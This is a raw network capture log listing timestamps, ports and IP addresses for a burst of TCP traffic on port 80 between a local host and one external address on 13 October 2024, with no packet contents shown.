Oct 13, 2024 07:28:59.553078890 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.553078890 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.553121090 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.553734064 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.553765059 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.553792953 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.553793907 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.553793907 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.553817034 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.553828001 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.553863049 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.554738998 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.554761887 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.554779053 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.554799080 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.554799080 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.554805040 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.554820061 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.554826975 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.554846048 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.554864883 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.555732012 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.555753946 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.555772066 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.555789948 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.555790901 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.555793047 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.555811882 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.555818081 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.555829048 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.555840015 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.555859089 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.555876017 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.556628942 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.556651115 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.556669950 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.556689024 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.556689024 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.556691885 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.556710005 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.556729078 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.557602882 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.557624102 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.557646990 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.557658911 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.557658911 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.557667971 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.557681084 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.557688951 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.557703972 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.557725906 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.558386087 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.558408976 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.558429003 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.558444023 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.558444023 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.558450937 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.558464050 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.558485985 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.559262991 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.559283018 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.559307098 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.559319973 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.559320927 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.559328079 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.559343100 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.559350014 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.559387922 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.559556007 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.560115099 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.560134888 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.560158014 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.560170889 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.560170889 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.560178995 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.560192108 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.560214043 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.560965061 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.560987949 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.561006069 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.561017990 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.561050892 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.561050892 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.627748966 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.627783060 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.627829075 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.628062963 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.628169060 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.628226042 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.628268957 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.628294945 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.628319025 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.628346920 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.628441095 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.628442049 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.628442049 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.628442049 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.629044056 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.629065037 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.629086971 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.629110098 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.629210949 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.629210949 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.629210949 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.629211903 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.629704952 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.629724979 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.629746914 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.629764080 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.629764080 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.629766941 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.629786968 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.629807949 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.630601883 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.630620956 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.630636930 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.630657911 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.630676985 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.630721092 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.630721092 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.630759954 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.630759954 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.631519079 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.631539106 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.631561995 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.631577015 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.631580114 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.631601095 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.631601095 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.631603003 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.631625891 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.631645918 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.632385969 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.632405996 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.632427931 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.632441044 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.632441044 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.632450104 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.632468939 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.632468939 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.632489920 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.632508993 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.633274078 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.633294106 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.633316040 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.633332968 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.633332968 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.633339882 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.633353949 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.633378983 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.634171963 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.634192944 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.634212017 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.634229898 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.634229898 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.634234905 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.634253025 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.634269953 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.635071039 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.635091066 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.635113001 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.635129929 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.635129929 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.635132074 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.635154009 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.635155916 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.635178089 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.635195971 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.635804892 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.635824919 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.635847092 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.635864019 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.635864019 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.635869980 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.635886908 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.635889053 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.635906935 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.635914087 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.635924101 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.635966063 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.636694908 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.636713982 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.636735916 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.636750937 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.636750937 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.636759996 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.636774063 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.636780977 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.636801004 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.636802912 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.636820078 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.636837006 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.637589931 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.637612104 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.637624979 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.637649059 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.637649059 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.637651920 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.637670994 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.637680054 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.637690067 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.637702942 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.637720108 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.637741089 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.638473034 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.638516903 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.638539076 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.638552904 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.638552904 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.638560057 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.638580084 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.638587952 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.638628006 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.638628006 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.639380932 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.639411926 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.639429092 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.639434099 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.639460087 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.639463902 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.639477015 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.639486074 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.639508009 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.639517069 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.639528990 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.639566898 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.640355110 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.640374899 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.640397072 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.640408039 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.640408039 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.640418053 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.640431881 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.640439034 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.640453100 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.640460968 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.640494108 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.640494108 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.641180992 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.641200066 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.641222000 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.641241074 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.641241074 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.641243935 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.641262054 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.641263008 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.641282082 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.641287088 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.641340017 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.642054081 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.642074108 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.642095089 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.642112970 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.642113924 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.642118931 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.642134905 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.642141104 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.642158985 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.642164946 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.642179966 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.642214060 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.642911911 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.642930984 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.642952919 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.642966986 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.642966986 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.642975092 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.642992973 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.642997980 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.643007994 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.643019915 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.643033028 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.643063068 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.643764019 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.643783092 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.643805981 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.643824100 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.643824100 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.643827915 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.643846035 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.643846989 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.643867016 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.643873930 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.643887043 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.643927097 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.644572973 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.644592047 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.644613981 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.644632101 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.644632101 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.644637108 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.644654036 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.644658089 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.644671917 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.644695044 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.645328999 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.645348072 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.645370007 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.645380974 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.645380974 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.645392895 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.645412922 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.645431042 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.720537901 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.720597029 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.720618963 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.720709085 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.720727921 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.720751047 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.720772028 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.720911980 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.720911980 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.720911980 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.720911980 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.720912933 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.721318007 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.721340895 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.721359968 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.721379042 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.721396923 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.721635103 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.722189903 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.722209930 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.722238064 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.722250938 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.722259045 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.722280025 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.722280025 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.722280025 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.722305059 CEST	80	49161	104.168.7.25	192.168.2.22
Oct 13, 2024 07:28:59.722307920 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.722341061 CEST	49161	80	192.168.2.22	104.168.7.25
Oct 13, 2024 07:28:59.722341061 CEST	49161	80	192.168.2.22	104.168.7.25
